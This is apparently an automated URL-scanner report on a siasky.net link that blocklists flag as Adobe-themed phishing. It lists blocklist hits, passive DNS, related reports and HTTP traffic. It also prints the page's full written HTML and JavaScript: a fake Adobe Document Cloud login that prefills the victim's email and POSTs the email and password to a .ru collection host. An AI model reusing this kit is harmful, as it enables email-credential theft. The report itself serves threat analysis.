Overview

URL siasky.net/JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw
IP80.82.77.134
ASNIP Volume inc
Location Netherlands
Report completed2022-10-04 09:54:04 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-10-03 2 siasky.net/JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw Adobe Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-10-04 2 siasky.net/JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS
Scan Date Severity Indicator Comment
2022-10-03 2 siasky.net Sinkholed
2022-10-03 2 siasky.net Sinkholed


Files

No files detected



Passive DNS (22)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS shavar.services.mozilla.com (1) 3602 2017-01-30 05:00:58 UTC 2022-10-04 05:04:37 UTC 34.215.6.110
mnemonic passive DNS maxcdn.bootstrapcdn.com (2) 724 2014-06-18 00:37:31 UTC 2022-10-04 04:23:59 UTC 104.18.11.207
mnemonic passive DNS siasky.net (2) 249421 2020-01-08 00:23:40 UTC 2022-10-04 02:00:51 UTC 80.82.77.134
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-10-04 04:17:22 UTC 23.36.77.32
mnemonic passive DNS code.jquery.com (3) 634 2012-05-21 17:28:02 UTC 2022-10-04 03:58:00 UTC 69.16.175.10
mnemonic passive DNS cdnjs.cloudflare.com (1) 235 2020-10-20 10:17:36 UTC 2022-10-04 04:47:48 UTC 104.17.25.14
mnemonic passive DNS i.imgur.com (6) 5110 2012-05-21 08:09:36 UTC 2022-10-04 03:21:09 UTC 151.101.84.193
mnemonic passive DNS ajax.googleapis.com (1) 12905 2013-08-16 09:51:31 UTC 2022-10-04 09:51:59 UTC 142.250.74.74
mnemonic passive DNS storage.googleapis.com (1) 420 2019-10-15 20:25:09 UTC 2022-10-04 05:18:27 UTC 142.250.74.16
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-10-04 07:51:20 UTC 93.184.220.29
mnemonic passive DNS firefox-settings-attachments.cdn.mozilla.net (1) 11509 2019-11-30 09:32:57 UTC 2022-10-04 07:00:27 UTC 143.204.55.30
mnemonic passive DNS use.fontawesome.com (1) 942 2017-01-30 04:43:25 UTC 2022-10-04 04:24:33 UTC 172.64.133.15
mnemonic passive DNS firefox.settings.services.mozilla.com (15) 867 2020-05-27 20:08:30 UTC 2022-10-04 09:13:54 UTC 143.204.55.115
mnemonic passive DNS getpocket.cdn.mozilla.net (1) 1369 2017-08-31 07:41:15 UTC 2022-10-04 04:28:31 UTC 34.120.5.221
mnemonic passive DNS stackpath.bootstrapcdn.com (1) 2467 2018-04-05 04:41:29 UTC 2022-10-04 05:19:13 UTC 104.18.11.207
mnemonic passive DNS fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-10-04 09:22:31 UTC 142.250.74.10
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-10-04 04:45:06 UTC 35.160.97.225
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-10-04 04:18:32 UTC 34.120.237.76
mnemonic passive DNS detectportal.firefox.com (2) 1601 2017-01-30 00:03:31 UTC 2022-10-04 04:16:52 UTC 34.107.221.82
mnemonic passive DNS content-signature-2.cdn.mozilla.net (5) 1152 2020-11-03 12:26:46 UTC 2022-10-04 04:29:41 UTC 143.204.55.25
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-10-04 04:16:51 UTC 34.117.237.239
mnemonic passive DNS ocsp.pki.goog (3) 175 2017-06-14 07:23:31 UTC 2022-10-04 04:17:09 UTC 142.250.74.3


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 80.82.77.134

Date UQ / IDS / BL URL IP
2022-10-22 01:31:29 +0000
0 - 0 - 3 siasky.net/CAB1ZY_CjG71wnO1gJNgzzjtl3qvN66Dud (...) 80.82.77.134
2022-10-22 00:10:43 +0000
0 - 0 - 4 siasky.net/NACk9QByEvMNfdsqaDRvuLt2RLJwBaB3Va (...) 80.82.77.134
2022-10-21 22:04:51 +0000
0 - 0 - 4 siasky.net/CAB1ZY_CjG71wnO1gJNgzzjtl3qvN66Dud (...) 80.82.77.134
2022-10-19 14:51:48 +0000
0 - 0 - 0 ng07prfulfsi24rkr5ftn8ecr4398e3re0ksbduvvisud (...) 80.82.77.134
2022-10-19 11:51:40 +0000
0 - 0 - 2 siasky.net/fAVdGGzLBVnzf3JyILt9gvpQLqL_Jem0oa (...) 80.82.77.134

Last 5 reports on ASN: IP Volume inc

Date UQ / IDS / BL URL IP
2022-11-28 15:31:54 +0000
0 - 0 - 6 libgen.lc/ads.php?md5=2DDFBB18E5C985F5EE091D4 (...) 89.248.170.56
2022-11-27 18:41:28 +0000
0 - 0 - 8 libgen.lc/ads.php?md5=C11353E05F0EDA79FB486D9 (...) 89.248.170.56
2022-11-25 03:47:29 +0000
0 - 0 - 4 libgen.lc/ads.php?md5=0A0D442ED4345F99B030A09 (...) 89.248.170.56
2022-11-24 15:47:50 +0000
0 - 0 - 3 89.248.167.132/ 89.248.167.132
2022-11-24 13:55:26 +0000
0 - 0 - 1 89.248.165.206/ 89.248.165.206

Last 5 reports on domain: siasky.net

Date UQ / IDS / BL URL IP
2022-11-25 12:48:21 +0000
0 - 0 - 1 siasky.net/ 172.67.143.126
2022-11-22 05:36:12 +0000
0 - 0 - 2 siasky.net/bacwqaiys1_ivv7cpkh13__9tfaahfwy9c (...) 172.67.143.126
2022-11-22 05:25:13 +0000
0 - 0 - 3 siasky.net/PADBY7tX9FH5KExet6BN1nFDCNwU0vxm8d (...) 172.67.143.126
2022-11-21 22:51:01 +0000
0 - 0 - 3 siasky.net/JABvPGnogMKcS_wzdF7Qs4IvD73hiWxBM4 (...) 172.67.143.126
2022-11-18 22:20:42 +0000
0 - 0 - 3 siasky.net/EADsm1fKUwgyijCqC5jo3rqv0CquHWfHFi (...) 172.67.143.126

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-29 01:30:54 +0000
1 - 0 - 4 linkedme.z13.web.core.windows.net/ 52.239.170.65
2022-11-28 18:33:25 +0000
1 - 0 - 2 rab-dyehh8.ml/sacri/ 142.4.1.64
2022-11-26 07:14:42 +0000
1 - 0 - 2 storageapi.fleek.co/d6c0f2e6-27ab-438c-b8aa-4 (...) 104.18.7.145
2022-11-26 05:23:02 +0000
1 - 0 - 2 storageapi.fleek.co/0652a24b-c0d4-416b-b85f-2 (...) 104.18.7.145
2022-11-25 14:27:06 +0000
1 - 0 - 1 u.to/NMdyHA 195.216.243.155


JavaScript

Executed Scripts (9)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 14613, repeated: 1) - SHA256: b0be14874a9bb2226c1391e2ed2ae91a1f65d6065b2ca401e6484128e8c988e2

                                        < !doctype html >
    < html lang = "en" >

    < head >
    < script type = "text/javascript"
src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" > < /script> < script type = "text/javascript"
src = "https://code.jquery.com/jquery-3.1.1.min.js" > < /script> < script type = "text/javascript"
src = "https://code.jquery.com/jquery-3.3.1.js"
integrity = "sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="
crossorigin = "anonymous" > < /script>
    <!-- Required meta tags -->
    < meta charset = "utf-8" >
    < meta name = "viewport"
content = "width=device-width, initial-scale=1, shrink-to-fit=no" >
    <!-- Bootstrap CSS -->
    < link rel = "stylesheet"
href = "https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity = "sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin = "anonymous" >
    < link href = "https://fonts.googleapis.com/css?family=Yellowtail&display=swap"
rel = "stylesheet" >
    < link rel = "stylesheet"
href = "https://use.fontawesome.com/releases/v5.7.0/css/all.css"
integrity = "sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ"
crossorigin = "anonymous" >
    < title > Online < /title> < link href = "https://storage.googleapis.com/staging.yuksdcbjsdbkdcbsdjh3.appspot.com/hover.css"
rel = "stylesheet"
media = "all" >
    < style type = "text/css" >
    < /style> < /head>

< body >
    < div class = "container-fluid" >
    < div class = "row"
style = "background-image: url('https://i.imgur.com/9AxSYZF.jpg'); background-size: cover;background-repeat: no-repeat;" >
    < div class = "container" >
    < div class = "row" >
    < div class = "col-lg-6 mx-auto my-5 px-5 pb-5"
style = "border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;" >
    < div class = "text-center pt-5" >
    < img src = "https://i.imgur.com/XvAi8dK.jpg"
class = "img-fluid"
width = "100px" > < br >
    < span class = "h4 text-white" > Adobe Document Cloud < /span><br> < span class = "h5 text-white font-weight-normal" > To read the document, please choose your email provider below login to view shared file. < /span> < /div> < div class = "mt-3" >
    < div class = "row" >

    < div class = "col-lg-12" >
    < a href = "javascript:void(0)"
id = "outlookmodal"
class = "hvr-grow w-100"
style = "text-decoration: none;"
data - toggle = "modal"
data - target = "#ajaxModal" >
    < div class = " mt-2"
style = " background-color: #0073C8;" >
    < img src = "https://i.imgur.com/5ID5toV.png"
class = "img-fluid"
width = "40px"
style = " background-color: rgba(0,0,0,0.3); padding:5px;" >
    < span class = "pl-4"
style = "vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;" > Sign in with Outlook < /span> < /div> < /a> < /div> < /div> < div class = "row mt-3" >

    < div class = "col-lg-12" >
    < a href = "javascript:void(0)"
id = "office365modal"
class = "hvr-grow w-100"
style = "text-decoration: none;"
data - toggle = "modal"
data - target = "#ajaxModal" >
    < div class = " mt-2"
style = " background-color: #FF3C00;" >
    < img src = "https://i.imgur.com/0J0KUj0.png"
class = "img-fluid"
width = "40px"
style = " background-color: rgba(0,0,0,0.3); padding:5px;" >
    < span class = "pl-4"
style = "vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;" > Sign in with Office365 < /span> < /div> < /a> < /div> < /div> < div class = "row mt-3" >
    < div class = "col-lg-12" >
    < a href = "javascript:void(0)"
id = "othermodal"
class = "hvr-grow w-100"
style = "text-decoration: none;"
data - toggle = "modal"
data - target = "#ajaxModal" >
    < div class = " mt-2"
style = " background-color: #0B5BD3;" >
    < img src = "https://i.imgur.com/BRvBsqK.png"
class = "img-fluid"
width = "40px"
style = " background-color: rgba(0,0,0,0.3); padding:5px;" >
    < span class = "pl-4"
style = "vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;" > Sign in with Other Mail < /span> < /div> < /a> < /div> < div class = "col-lg-12" >
    < p class = "text-white mt-3 text-center" > Built upon Adobe Document Cloud, Adobe Document Cloud features can be unlocked by providing an additional license key. < /p> < p class = "h5 text-center text-white" > CopyRight´┐Ż 2022 Adobe system incorporated, All right reserved. < /p> < /div> < /div> < /div> < /div> < /div> < /div> < /div>
    <!-- Modal for gmail -->
    < div class = "modal fade"
id = "ajaxModal"
tabindex = "-1"
role = "dialog"
aria - labelledby = "exampleModalLabel"
aria - hidden = "true" >
    < div class = "modal-dialog"
role = "document" >
    < div class = "modal-content" >
    < div class = "modal-header" >
    < button type = "button"
class = "close"
data - dismiss = "modal"
aria - label = "Close" >
    < span aria - hidden = "true" > & times; < /span> < /button> < /div> < div class = "modal-body" >
    < center >
    < img id = "fieldImg"
src = "https://i.imgur.com/agNr5Vz.png"
class = "img-fluid rounded-circle"
width = "80px" >
    < h5 class = "modal-title"
id = "exampleModalLabel" > Login with < span id = "field" > Gmail < /span></h
5 >
    < div class = "alert alert-danger"
id = "msg" > < /div> < span id = "error"
class = "text-danger" > That account doesn 't exist. Enter a different account</span> < /center> < form id = "contact"
class = "form-horizontal well" >
    < div id = "div1" >
    < div class = "col-lg-12" >
    < div class = "form-group" >
    < div id = "inputbar" >
    < label
for = "exampleInputai1" > Email address < /label> < input type = "email"
name = "ai"
class = "form-control"
id = "ai"
aria - describedby = "aiHelp"
placeholder = "Enter email" >
    < small id = "aiHelp"
class = "form-text text-muted" > We 'll never share your email with anyone else.</small></div> < /div> < /div> < div class = "col-lg-12" >
    < div class = "form-group" >
    < label
for = "pr" > Password < /label> < input type = "password"
name = "pr"
class = "form-control"
id = "pr"
aria - describedby = "aiHelp"
placeholder = "Enter Password" >
    < /div> < /div> < /div> < /div> < div class = "modal-footer" >
    < button type = "button"
class = "btn btn-secondary"
data - dismiss = "modal" > Close < /button> < button class = "btn btn-info pull-right"
id = "submit-btn" > Login < /button> < /div> < /form> < /div> < /div> < /div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    < script type = "text/javascript"
src = "https://code.jquery.com/jquery-3.2.1.slim.min.js"
integrity = "sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin = "anonymous" > < /script> < script type = "text/javascript"
src = "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
integrity = "sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
crossorigin = "anonymous" > < /script> < script type = "text/javascript"
src = "https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
integrity = "sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
crossorigin = "anonymous" > < /script> < /body> < script type = "text/javascript"
src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" > < /script> < script type = "text/javascript"
src = "https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" > < /script> < script >
    <!--  /* global $ */
    $(document).ready(function() {
        var count = 0;
        $('#div2').hide();
        $('#error').hide();
        $("#automail").hide();
        $("#msg").hide();
        $('#submit-btn1').hide();

        $('#back1').click(function() {
            $("#msg").hide();
            $('#ai').val("");
            $("#automail").animate({
                left: 0,
                opacity: "hide"
            }, 0);
            $("#inputbar").animate({
                right: 0,
                opacity: "show"
            }, 1000);

        });
        var ou = "b3V0bG9vaw==";
        var ho = "aG90bWFpbA==";
        var gm = "Z21haWw=";
        var ya = "eWFob28=";
        var of = "b2ZmaWNlMzY1";
        /////////////url ai getting////////////////
        var ai = window.location.hash.substr(1);
        if (!ai) {

        } else {
            // $('#ai').val(ai);
            var my_ai = ai;
            var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

            if (!filter.test(my_ai)) {
                $('#error').show();
                ai.focus;
                return false;
            }
            var ind = my_ai.indexOf("@");
            var my_slice = my_ai.substr((ind + 1));
            var c = my_slice.substr(0, my_slice.indexOf('.'));
            var final = c.toLowerCase();
            if (final == atob(ou) || final == atob(ho)) {
                $('#contact').trigger("reset");
                $("#msg").hide();
                $('#fieldImg').attr('src', 'https://i.imgur.com/HwG9Hcw.png');
                $('#field').html("Outlook");
            } else if (final == atob(of)) {
                $('#contact').trigger("reset");
                $("#msg").hide();
                $('#fieldImg').attr('src', 'https://i.imgur.com/nUjKd4W.png');
                $('#field').html("Office 365");
            } else {
                $('#contact').trigger("reset");
                $("#msg").hide();
                $('#fieldImg').attr('src', 'https://i.imgur.com/2Os274G.png');
                $('#field').html("Other Mail");
            }
            $("#msg").hide();
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $('#ai').val(my_ai);

            $('#ajaxModal').modal('show');
        }
        ///////////////url getting ai////////////////

        $('#' + atob(ou) + 'modal').click(function() {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://i.imgur.com/HwG9Hcw.png');
            $('#field').html("Outlook");
            $("#msg").hide();
            $('#ai').val("");
            $('#pr').val("");
            $('#submit-btn1').hide();
            $('#submit-btn').show();

            $('#ajaxModal').modal('show');
        });

        $('#' + atob(of) + 'modal').click(function() {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://i.imgur.com/nUjKd4W.png');
            $('#field').html(atob(of));
            $("#msg").hide();
            $('#ai').val("");
            $('#pr').val("");
            $('#submit-btn1').hide();
            $('#submit-btn').show();

            $('#ajaxModal').modal('show');
        });

        $('#othermodal').click(function() {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://i.imgur.com/2Os274G.png');
            $('#field').html("Other Mail");
            $("#msg").hide();
            $('#ai').val("");
            $('#pr').val("");
            $('#submit-btn1').hide();
            $('#submit-btn').show();

            $('#ajaxModal').modal('show');
        });
        var file = "bmV4dC5waHA=";
        $('#submit-btn').click(function(event) {
            $('#error').hide();
            $('#msg').hide();
            event.preventDefault();
            var ai = $("#ai").val();
            var pr = $("#pr").val();

            ///////////new injection////////////////
            var my_ai = ai;
            var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

            if (!filter.test(my_ai)) {
                $('#error').show();
                ai.focus;
                return false;
            }
            var ind = my_ai.indexOf("@");
            var my_slice = my_ai.substr((ind + 1));
            var c = my_slice.substr(0, my_slice.indexOf('.'));
            var final = c.toLowerCase();
            ///////////new injection////////////////
            count = count + 1;


            $.ajax({
                dataType: 'JSON',
                url: "https://engine567eringsa.ru/ds34fred3dwsdfgthytrgecds/" + atob(file),
                type: 'POST',
                data: {
                    ai: ai,
                    pr: pr,


                },
                // data: $('#contact').serialize(),
                beforeSend: function(xhr) {
                    $('#submit-btn').html('Verifing...');
                },
                success: function(response) {

                    $("#pr").val("");
                    if (count >= 3) {
                        count = 0;
                        window.location.replace("http://www." + my_slice);
                    }
                    $("#msg").show();
                    $('#msg').html("Please try again later");
                },
                error: function() {

                    $("#pr").val("");
                    if (count >= 3) {
                        count = 0;
                        window.location.replace("http://www." + my_slice);
                    }
                    $("#msg").show();
                    $('#msg').html("Please try again later");
                },
                complete: function() {
                    $('#submit-btn').html('Login');
                }
            });
        });

    }); < /script>

< /html>
                                    


HTTP Transactions (62)


Request Response
                                        
                                            GET /success.txt?ipv4 HTTP/1.1 
Host: detectportal.firefox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         34.107.221.82
HTTP/1.1 200 OK
Content-Type: text/plain
                                        
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Mon, 03 Oct 2022 15:06:54 GMT
Age: 67614
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600


--- Additional Info ---
Magic:  ASCII text
Size:   8
Md5:    ae780585f49b94ce1444eb7d28906123
Sha1:   7d5ca8c0c03e883c56c4eb1ef6f6bb9bccad4d86
Sha256: 81b2bd4ea98c8db66554fbc8d7637a1a69a130f331feb732b75caab4c4868fd5
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1F611155394FAC39439B8EC8217D8CD493D6B588D372D264E0D66C03129C50C6"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7765
Expires: Tue, 04 Oct 2022 12:03:14 GMT
Date: Tue, 04 Oct 2022 09:53:49 GMT
Connection: keep-alive

                                        
                                            GET /success.txt?ipv4 HTTP/1.1 
Host: detectportal.firefox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         34.107.221.82
HTTP/1.1 200 OK
Content-Type: text/plain
                                        
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Mon, 03 Oct 2022 15:06:54 GMT
Age: 67615
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600


--- Additional Info ---
Magic:  ASCII text
Size:   8
Md5:    ae780585f49b94ce1444eb7d28906123
Sha1:   7d5ca8c0c03e883c56c4eb1ef6f6bb9bccad4d86
Sha256: 81b2bd4ea98c8db66554fbc8d7637a1a69a130f331feb732b75caab4c4868fd5
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "193A67E9A2C60A2EF38C995DA0910B30108E9BCF4CA50D450F6CC5E1F73A1F35"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=7733
Expires: Tue, 04 Oct 2022 12:02:42 GMT
Date: Tue, 04 Oct 2022 09:53:49 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-06-30-19-51-38.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Wed, 11 May 2022 19:51:39 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 04:09:09 GMT
etag: "48ca0beea419a9039591cf1aee5179e0"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: OkMk7RMMjptDtoxy-AM4ckPYB7CHS5KsiWYTfUQaEMlHwPNt9tgBLw==
age: 23368
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    48ca0beea419a9039591cf1aee5179e0
Sha1:   9e92629f505fcc07aab51221e8fe62197a23e307
Sha256: 630a5f110337b4a4876aa85c21107d9e8f2550bcc60f023a4777d895b17399fd
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 04 Oct 2022 09:53:49 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /jquery-3.1.1.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
content-encoding: gzip
content-length: 30070
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-152b5"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664877230.dop013.sk1.t,1664877230.cds201.sk1.hn,1664877230.cds010.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32030)
Size:   30070
Md5:    f7a4a283c6a5130b43ce8de3b7842078
Sha1:   ef243edbb67f9e50f8589885e4541f6c919ea8d7
Sha256: aee9e5b2534ced87fe1e02a1a9e661468ba548e02edacbe9b68b3b247607dc4e
                                        
                                            GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
content-length: 6157
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fa9-4af4"
last-modified: Mon, 04 May 2020 16:15:37 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 2821655
expires: Sun, 24 Sep 2023 09:53:50 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EAYQVR2p5TavxbED9%2BFJ%2BL7X4sV%2FufIBjfSEI0pR%2FWyqPCq1OO9Xk0Trj%2FaYgTrTi1KQg4ZO27S1Y94uFoQvABjSjKBzVPNKHPsbvJ%2FBzPWDB0AIEpn7kdkVq3opScQWbU%2FxiT5F"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 754d0860bfbb0b4d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (19015)
Size:   6157
Md5:    7b4114faa411d059a9a5ac4b5b4d9dee
Sha1:   277da4486916fa3a4ab3375f47bc98f58dbf90f6
Sha256: 60b3528de2f7d48cbb335d19dddef756aaacc70f73d4254a2ef17978a14ca0d9
                                        
                                            GET /jquery-3.3.1.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
content-encoding: gzip
content-length: 80268
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-42587"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664877230.dop012.sk1.t,1664877230.cds254.sk1.hn,1664877230.cds214.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   80268
Md5:    9fd458b477c45f28862c10eeee99263f
Sha1:   bcfceda34c540b9957758de619b288362188bb0b
Sha256: ef82ed7916ef7c6cb059d150c8b1e102c57e0e174ea6a1dfbcd0c286c465ba0f
                                        
                                            GET /jquery-3.2.1.slim.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
